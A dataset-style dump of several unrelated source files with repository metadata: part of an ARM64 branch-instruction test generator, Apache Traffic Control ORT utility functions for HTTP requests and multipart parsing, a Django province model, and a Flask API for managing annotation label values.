yield self.testcase_insn(nr, '{insn}{space}{reg}, #{bit}, {label}'.format(**locals()))
yield ret_label + ':'
if (insn == 'tbz' and val == 0) or (insn == 'tbnz' and val != 0):
yield ' // should jump'
x0 = self.branch[label_idx]
else:
yield ' // shouldn\'t jump'
x0 = self.nobranch[label_idx]
yield state.check({'x0':x0})
yield state.restore()
def test_end(self):
for i in xrange(1, len(self.symbols), 2):
yield ' .skip %d' % random.randrange(512, 2048, 4)
yield self.symbols[i] + ':'
yield ' ldr\t\tx0, ={0}'.format(hex(self.branch[i]))
yield ' ret'
| 38.42029 | 94 | 0.488118 | 2,614 | 0.986043 | 2,205 | 0.831762 | 0 | 0 | 0 | 0 | 334 | 0.12599 |
95128ff73c5b19e12278311e5737397a3c5afe40
| 6,943 |
py
|
Python
|
infrastructure/cdn-in-a-box/ort/traffic_ops_ort/utils.py
|
hbeatty/incubator-trafficcontrol
|
13ed991531778c60298eb8f532b2a4862f7cb67b
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1 |
2021-04-11T16:55:27.000Z
|
2021-04-11T16:55:27.000Z
|
infrastructure/cdn-in-a-box/ort/traffic_ops_ort/utils.py
|
hbeatty/incubator-trafficcontrol
|
13ed991531778c60298eb8f532b2a4862f7cb67b
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 3 |
2021-03-12T22:35:02.000Z
|
2021-12-09T23:00:11.000Z
|
infrastructure/cdn-in-a-box/ort/traffic_ops_ort/utils.py
|
hbeatty/incubator-trafficcontrol
|
13ed991531778c60298eb8f532b2a4862f7cb67b
|
[
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains miscellaneous utilities, typically dealing with string
manipulation or user input/output
"""
import logging
from sys import stderr
import requests
import typing
def getYesNoResponse(prmpt:str, default:str = None) -> bool:
"""
Utility function to get an interactive yes/no response to the prompt `prmpt`
:param prmpt: The prompt to display to users
:param default: The default response; should be one of ``'y'``, ``"yes"``, ``'n'`` or ``"no"``
(case insensitive)
:raises AttributeError: if 'prmpt' and/or 'default' is/are not strings
:returns: the parsed response as a boolean
"""
if default:
prmpt = prmpt.rstrip().rstrip(':') + '['+default+"]:"
while True:
choice = input(prmpt).lower()
if choice in {'y', 'yes'}:
return True
if choice in {'n', 'no'}:
return False
if not choice and default is not None:
return default.lower() in {'y', 'yes'}
print("Please enter a yes/no response.", file=stderr)
def getTextResponse(uri:str, cookies:dict = None, verify:bool = True) -> str:
"""
Gets the plaintext response body of an HTTP ``GET`` request
:param uri: The full path to a resource for the request
:param cookies: An optional dictionary of cookie names mapped to values
:param verify: If :const:`True`, the SSL keys used to communicate with the full URI will be
verified
:raises ConnectionError: when an error occurs trying to communicate with the server
:raises ValueError: if the server's response cannot be interpreted as a UTF-8 string - e.g.
when the response body is raw binary data but the response headers claim it's UTF-16
"""
logging.info("Getting plaintext response via 'HTTP GET %s'", uri)
response = requests.get(uri, cookies=cookies, verify=verify)
if response.status_code not in range(200, 300):
logging.warning("Status code (%d) seems to indicate failure!", response.status_code)
logging.debug("Response: %r\n%r", response.headers, response.content)
return response.text
def getJSONResponse(uri:str, cookies:dict = None, verify:bool = True) -> dict:
"""
Retrieves a JSON object from some HTTP API
:param uri: The URI to fetch
:param cookies: A dictionary of cookie names mapped to values
:param verify: If this is :const:`True`, the SSL keys will be verified during handshakes with
'https' URIs
:returns: The decoded JSON object
:raises ConnectionError: when an error occurs trying to communicate with the server
:raises ValueError: when the request completes successfully, but the response body
does not represent a JSON-encoded object.
"""
logging.info("Getting JSON response via 'HTTP GET %s", uri)
try:
response = requests.get(uri, cookies=cookies, verify=verify)
except (ValueError, ConnectionError, requests.exceptions.RequestException) as e:
raise ConnectionError from e
if response.status_code not in range(200, 300):
logging.warning("Status code (%d) seems to indicate failure!", response.status_code)
logging.debug("Response: %r\n%r", response.headers, response.content)
return response.json()
def parse_multipart(raw: str) -> typing.List[typing.Tuple[str, str]]:
"""
Parses a multipart/mixed-type payload and returns each contiguous chunk.
:param raw: The raw payload - without any HTTP status line.
:returns: A list where each element is a tuple where the first element is a chunk of the message. All headers are discarded except 'Path', which is the second element of each tuple if it was found in the chunk.
:raises: ValueError if the raw payload cannot be parsed as a multipart/mixed-type message.
>>> testdata = '''MIME-Version: 1.0\\r
... Content-Type: multipart/mixed; boundary="test"\\r
... \\r
... --test\\r
... Content-Type: text/plain; charset=us-ascii\\r
... Path: /path/to/ats/root/directory/etc/trafficserver/fname\\r
... \\r
... # A fake testing file that wasn't generated at all on some date
... CONFIG proxy.config.way.too.many.period.separated.words INT 1
...
... --test\\r
... Content-Type: text/plain; charset=utf8\\r
... Path: /path/to/ats/root/directory/etc/trafficserver/othername\\r
... \\r
... # The same header again
... CONFIG proxy.config.the.same.insane.chain.of.words.again.but.the.last.one.is.different INT 0
...
... --test--\\r
... '''
>>> output = parse_multipart(testdata)
>>> print(output[0][0])
# A fake testing file that wasn't generated at all on some date
CONFIG proxy.config.way.too.many.period.separated.words INT 1
>>> output[0][1]
'/path/to/ats/root/directory/etc/trafficserver/fname'
>>> print(output[1][0])
# The same header again
CONFIG proxy.config.the.same.insane.chain.of.words.again.but.the.last.one.is.different INT 0
>>> output[1][1]
'/path/to/ats/root/directory/etc/trafficserver/othername'
"""
try:
hdr_index = raw.index("\r\n\r\n")
headers = {line.split(':')[0].casefold(): line.split(':')[1] for line in raw[:hdr_index].splitlines()}
except (IndexError, ValueError) as e:
raise ValueError("Invalid or corrupt multipart header") from e
ctype = headers.get("content-type")
if not ctype:
raise ValueError("Message is missing 'Content-Type' header")
try:
param_index = ctype.index(";")
params = {param.split('=')[0].strip(): param.split('=')[1].strip() for param in ctype[param_index+1:].split(';')}
except (IndexError, ValueError) as e:
raise ValueError("Invalid or corrupt 'Content-Type' header") from e
boundary = params.get("boundary", "").strip('"\'')
if not boundary:
raise ValueError("'Content-Type' header missing 'boundary' parameter")
chunks = raw.split(f"--{boundary}")[1:] # ignore prologue
if chunks[-1].strip() != "--":
logging.warning("Final chunk appears invalid - possible bad message payload")
else:
chunks = chunks[:-1]
ret = []
for i, chunk in enumerate(chunks):
try:
hdr_index = chunk.index("\r\n\r\n")
headers = {line.split(':')[0].casefold(): line.split(':')[1] for line in chunk[:hdr_index].splitlines() if line}
except (IndexError, ValueError) as e:
logging.debug("chunk: %s", chunk)
raise ValueError(f"Chunk #{i} poorly formed") from e
ret.append((chunk[hdr_index+4:].replace("\r","").strip(), headers.get("path").strip()))
return ret
| 38.572222 | 211 | 0.715109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,621 | 0.665562 |
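A short, hedged example of the fetch and prompt helpers above, assuming they are in scope; the Traffic Ops host and session cookie are placeholders.

# Hypothetical host and cookie value -- substitute a real Traffic Ops instance.
cookies = {"mojolicious": "<session-cookie>"}
servers = getJSONResponse("https://trafficops.example.test/api/servers",
                          cookies=cookies, verify=False)
if getYesNoResponse("Print the raw response?", default='n'):
    print(servers)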
9512a6419412924d68f8311278ec236177bb738a
| 138 |
py
|
Python
|
api/models/province.py
|
krosben/api-ctan
|
01d5e29694e6f4e35fbe6797c319b109e5bc1c3f
|
[
"MIT"
] | null | null | null |
api/models/province.py
|
krosben/api-ctan
|
01d5e29694e6f4e35fbe6797c319b109e5bc1c3f
|
[
"MIT"
] | 6 |
2020-06-05T23:40:32.000Z
|
2021-06-10T19:03:25.000Z
|
api/models/province.py
|
krosben/api-ctan
|
01d5e29694e6f4e35fbe6797c319b109e5bc1c3f
|
[
"MIT"
] | null | null | null |
from django.db import models
class Province(models.Model):
name = models.CharField(max_length=50, help_text="Name of the province")
| 23 | 76 | 0.76087 | 106 | 0.768116 | 0 | 0 | 0 | 0 | 0 | 0 | 22 | 0.15942 |
9513d85dbfeb9ed30b03373fa4dafc60c0d1a5b4
| 7,512 |
py
|
Python
|
audino/backend/routes/labels.py
|
UCSD-E4E/Pyrenote
|
bede2cfae9cb543a855d5cb01133b8d7c4abaa1c
|
[
"MIT"
] | 11 |
2021-07-09T21:39:05.000Z
|
2022-03-06T23:11:44.000Z
|
audino/backend/routes/labels.py
|
UCSD-E4E/Pyrenote
|
bede2cfae9cb543a855d5cb01133b8d7c4abaa1c
|
[
"MIT"
] | 120 |
2021-07-08T04:15:18.000Z
|
2022-02-26T00:21:25.000Z
|
audino/backend/routes/labels.py
|
UCSD-E4E/Pyrenote
|
bede2cfae9cb543a855d5cb01133b8d7c4abaa1c
|
[
"MIT"
] | 1 |
2021-10-16T04:55:42.000Z
|
2021-10-16T04:55:42.000Z
|
import sqlalchemy as sa
from flask import jsonify, request
from flask_jwt_extended import jwt_required, get_jwt_identity
import csv
from sqlalchemy.sql.expression import false
from backend import app, db
from backend.models import Label, LabelValue, Project
from .helper_functions import (
check_admin,
check_admin_permissions,
general_error,
missing_data
)
from . import api
@api.route("/labels/<int:label_id>/values", methods=["POST"])
@jwt_required
def add_value_to_label(label_id):
msg, status, request_user = check_admin_permissions(get_jwt_identity())
if msg is not None:
return msg, status
value = request.json.get("value", None)
if not value:
return (
jsonify(message="Please provide a label value!",
type="VALUE_MISSING"), 400,)
try:
label_value = LabelValue(value=value, label_id=label_id)
db.session.add(label_value)
db.session.commit()
db.session.refresh(label_value)
except Exception as e:
if type(e) == sa.exc.IntegrityError:
app.logger.error(e)
return (
jsonify(
message=f"Label Value: {value} already exists!",
type="DUPLICATE_VALUE",
),
409,
)
msg = f"Error adding value to label"
return general_error(msg, e, type="VALUE_CREATION_FAILED")
return (
jsonify(
value_id=label_value.id,
message=f"Value assigned to label",
type="VALUE_ASSIGNED_TO_LABEL",
),
201,
)
@api.route("/labels/<int:label_id>/values/file", methods=["POST"])
@jwt_required
def add_value_to_label_from_file(label_id):
app.logger.info("hello")
msg, status, request_user = check_admin_permissions(get_jwt_identity(),
False)
if msg is not None:
return msg, status
file = request.files.get(str(0))
if not file:
return (
jsonify(message="Please provide a label value!",
type="VALUE_MISSING"), 400,)
app.logger.info("hello")
file = file.read().decode("utf-8-sig")
app.logger.info(file)
app.logger.info(type(file))
data = file.split("\n")
for value in data:
if value == "":
continue
try:
value = value.strip(' \t\n\r')
label_value = LabelValue(value=value, label_id=label_id)
db.session.add(label_value)
db.session.commit()
db.session.refresh(label_value)
except Exception as e:
if type(e) == sa.exc.IntegrityError:
app.logger.error(e)
else:
msg = f"Error adding value to label"
return general_error(msg, e, type="VALUE_CREATION_FAILED")
return (
jsonify(
value_id=label_value.id,
message=f"Value assigned to label",
type="VALUE_ASSIGNED_TO_LABEL",
),
201,
)
@api.route("/labels/<int:label_id>/values", methods=["GET"])
@jwt_required
def get_values_for_label(label_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
values = LabelValue.query.filter_by(label_id=label_id).all()
response = [
{
"value_id": value.id,
"value": value.value,
"created_on": value.created_at.strftime("%B %d, %Y"),
}
for value in values
]
except Exception as e:
return missing_data(f"No values exists for label with id: {label_id}",
additional_log=e)
return (jsonify(values=response), 200)
@api.route("/labels/<int:label_id>/values/<int:label_value_id>",
methods=["GET"])
@jwt_required
def fetch_label_value(label_id, label_value_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
value = LabelValue.query.get(label_value_id)
except Exception as e:
return missing_data(f"No values exists for label with id: {label_id}",
additional_log=e)
return (
jsonify(
values={
"value_id": value.id,
"value": value.value,
"created_on": value.created_at.strftime("%B %d, %Y"),
}
),
200,
)
@api.route("/labels/<int:label_id>/values/<int:label_value_id>",
methods=["DELETE"])
@jwt_required
def delete_label_value(label_id, label_value_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
value = LabelValue.query.get(label_value_id)
db.session.delete(value)
db.session.commit()
except Exception as e:
return missing_data(f"No values exists for value: {label_value_id}",
additional_log=e)
return (
jsonify(
values={
"value_id": value.id,
"value": value.value,
"created_on": value.created_at.strftime("%B %d, %Y"),
}
),
200,
)
@api.route("/labels/<int:label_id>/values/<int:label_value_id>",
methods=["PATCH"])
@jwt_required
def update_value_for_label(label_id, label_value_id):
msg, status, request_user = check_admin_permissions(get_jwt_identity())
if msg is not None:
return msg, status
value = request.json.get("value", None)
if not value:
return (
jsonify(message="Please provide a label value!",
type="VALUE_MISSING"),
400,
)
err = f"Label Value ID: {label_value_id} no exist w/ Label ID: {label_id}"
try:
label_value = LabelValue.query.get(label_value_id)
label_value.set_label_value(value)
db.session.commit()
except Exception as e:
if type(e) == sa.exc.IntegrityError:
app.logger.error(f"Label Value: {value} already exists! {e}")
return (
jsonify(
message=f"Label Value: {value} already exists!",
type="DUPLICATE_VALUE",
),
409,
)
return missing_data(err, additional_log=e)
return (
jsonify(
value_id=label_value.id,
value=label_value.value,
created_on=label_value.created_at.strftime("%B %d, %Y"),
),
200,
)
@api.route("/labels/<int:label_id>/projectId/<int:project_id>",
methods=["DELETE"])
@jwt_required
def delete_label(label_id, project_id):
msg, status, request_user = check_admin(get_jwt_identity())
if msg is not None:
return msg, status
try:
LabelCat = Label.query.get(label_id)
project = Project.query.get(project_id)
LabelValues = LabelValue.query.filter_by(label_id=label_id).all()
for value in LabelValues:
db.session.delete(value)
db.session.commit()
project.labels.remove(LabelCat)
db.session.delete(LabelCat)
db.session.commit()
except Exception as e:
message = f"No value found with value id: {LabelCat}"
return missing_data(message, additional_log=e)
return (jsonify(message="success"), 200)
| 29.574803 | 78 | 0.580804 | 0 | 0 | 0 | 0 | 7,097 | 0.944755 | 0 | 0 | 1,301 | 0.17319 |
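An illustrative client-side call against the label-value endpoint defined above; the host, the "/api" blueprint prefix, and the JWT are assumptions for the example, not confirmed by the Pyrenote sources.

import requests

resp = requests.post(
    "http://localhost:5000/api/labels/1/values",   # "/api" prefix assumed
    headers={"Authorization": "Bearer <JWT>"},
    json={"value": "bird-call"},
)
print(resp.status_code, resp.json())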